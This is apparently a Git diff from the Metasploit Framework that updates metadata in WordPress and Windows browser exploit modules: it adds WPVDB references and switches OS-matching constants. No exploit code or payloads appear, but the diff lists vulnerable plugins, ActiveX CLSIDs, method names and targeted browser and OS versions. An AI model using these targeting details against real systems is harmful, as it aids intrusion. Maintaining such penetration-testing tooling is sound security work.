[ 'BID', '59316' ],
[ 'URL', 'http://wordpress.org/support/topic/pwn3d' ],
[ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ]
[ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ],
[ 'WPVDB', '6622' ]
],
'Privileged' => false,
'Platform' => ['php'],

7
modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb
View File

@ -23,13 +23,14 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'Charlie Eriksen <charlie[at]ceriksen.com>',
'Charlie Eriksen <charlie[at]ceriksen.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '87353'],
['URL', 'http://secunia.com/advisories/51037/'],
['WPVDB', '6103']
],
'Privileged' => false,
'Payload' =>
@ -37,8 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'ConnectionType' => 'find'
}
},
'Platform' => 'php',
'Arch' => ARCH_PHP,

3
modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
View File

@ -31,7 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
['OSVDB', '82653'],
['BID', '53809'],
['EDB', '18993'],
['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html']
['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html'],
['WPVDB', '6106']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,

1
modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb
View File

@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2012-4915'],
['OSVDB', '88891'],
['URL', 'http://secunia.com/advisories/50832'],
['WPVDB', '6073']
],
'Privileged' => false,
'Payload' =>

3
modules/exploits/unix/webapp/wp_property_upload_exec.rb
View File

@ -31,7 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
['OSVDB', '82656'],
['BID', '53787'],
['EDB', '18987'],
['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html']
['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html'],
['WPVDB', '6225']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,

3
modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
View File

@ -34,7 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html']
['URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html'],
['WPVDB', '7118']
],
'Privileged' => false,
'Platform' => ['php'],

3
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
View File

@ -38,7 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
['URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html'],
['URL', 'http://www.mailpoet.com/security-update-part-2/'],
['URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
['URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php'],
['WPVDB', '6680']
],
'Privileged' => false,
'Platform' => ['php'],

2
modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:os_name => OperatingSystems::Match::WINDOWS,
:method => "GetVariable",
:classid => "ShockwaveFlash.ShockwaveFlash",
:rank => NormalRanking, # reliable memory corruption

2
modules/exploits/windows/browser/adobe_flash_rtmp.rb
View File

@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:os_name => OperatingSystems::Match::WINDOWS,
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",

3
modules/exploits/windows/browser/adobe_toolbutton.rb
View File

@ -49,8 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => Msf::OperatingSystems::WINDOWS,
:os_flavor => Msf::OperatingSystems::WindowsVersions::XP,
:os_name => OperatingSystems::Match::WINDOWS_XP,
:ua_name => Msf::HttpClients::IE
},
'Targets' =>

10
modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
View File

@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
:source => /script|headers/i,
:clsid => "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
:method => "ChooseFilePath",
:os_name => /win/i
:os_name => OperatingSystems::Match::WINDOWS,
},
'Targets' =>
[
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Windows XP with IE 6',
{
'os_flavor' => 'XP',
'os_name' => OperatingSystems::Match::WINDOWS_XP,
'ua_name' => 'MSIE',
'ua_ver' => '6.0',
'Rop' => false,
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Windows XP with IE 7',
{
'os_flavor' => 'XP',
'os_name' => OperatingSystems::Match::WINDOWS_XP,
'ua_name' => 'MSIE',
'ua_ver' => '7.0',
'Rop' => false,
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Windows XP with IE 8',
{
'os_flavor' => 'XP',
'os_name' => OperatingSystems::Match::WINDOWS_XP,
'ua_name' => 'MSIE',
'ua_ver' => '8.0',
'Rop' => true,
@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Windows Vista with IE 7',
{
'os_flavor' => 'Vista',
'os_name' => OperatingSystems::Match::WINDOWS_VISTA,
'ua_name' => 'MSIE',
'ua_ver' => '7.0',
'Rop' => false,

2
modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
View File

@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :ua_name => HttpClients::IE,
# :javascript => true,
# :rank => NormalRanking, # reliable memory corruption

2
modules/exploits/windows/browser/apple_quicktime_mime_type.rb
View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :ua_name => HttpClients::SAFARI,
# :ua_maxver => '5.0.1',
# :ua_maxver => '5.1.7',

2
modules/exploits/windows/browser/apple_quicktime_rtsp.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# # No particular browser. Works on at least IE6 and Firefox 1.5.0.3
# :javascript => true,
# :rank => NormalRanking, # reliable memory corruption

2
modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
View File

@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking, # reliable memory corruption
# :vuln_test => nil,

2
modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking
#})

2
modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :ua_name => HttpClients::IE,
# :javascript => true,
# :rank => NormalRanking,

2
modules/exploits/windows/browser/cisco_playerpt_setsource.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "6.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
# :method => "SetSource",
# :rank => NormalRanking

2
modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "6.0",
# :ua_maxver => "9.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
# :method => "SetSource",
# :rank => NormalRanking

2
modules/exploits/windows/browser/clear_quest_cqole.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "6.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :classid => "{94773112-72E8-11D0-A42E-00A024DED613}",
# :method => "RegisterSchemaRepoFromFileByDbSet",
# :rank => NormalRanking

2
modules/exploits/windows/browser/crystal_reports_printcontrol.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "6.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :rank => NormalRanking,
# :classid => "{88DD90B6-C770-4CFF-B7A4-3AFD16BB8824}",
# :method => "ServerResourceVersion"

2
modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "7.0",
# :ua_maxver => "9.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
# :method => "SetShapeNodeType",
# :rank => NormalRanking

2
modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "6.0",
# :ua_maxver => "9.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :rank => Rank,
# :classid => "{8D9E2CC7-D94B-4977-8510-FB49C361A139}",
# :method => "WriteFileBinary"

3
modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
View File

@ -17,8 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "6.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_ver => OperatingSystems::WindowsVersions::XP,
# :os_name => OperatingSystems::Match::WINDOWS_XP,
# :rank => NormalRanking,
# :classid => "{8D9E2CC7-D94B-4977-8510-FB49C361A139}",
# :method => "WriteFileString "

2
modules/exploits/windows/browser/ibm_spss_c1sizer.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "6.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :rank => NormalRanking,
# :classid => "{24E04EBF-014D-471F-930E-7654B1193BA9}",
# :method => "TabCaption"

2
modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
#include Msf::Exploit::Remote::BrowserAutopwn
#
#autopwn_info({
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :ua_name => HttpClients::IE,
# :ua_minver => "6.0",
# :ua_maxver => "8.0",

2
modules/exploits/windows/browser/ie_cbutton_uaf.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_minver => "8.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :rank => GoodRanking
#})

2
modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
:ua_minver => "8.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => GoodRanking
})

Some files were not shown because too many files have changed in this diff Show More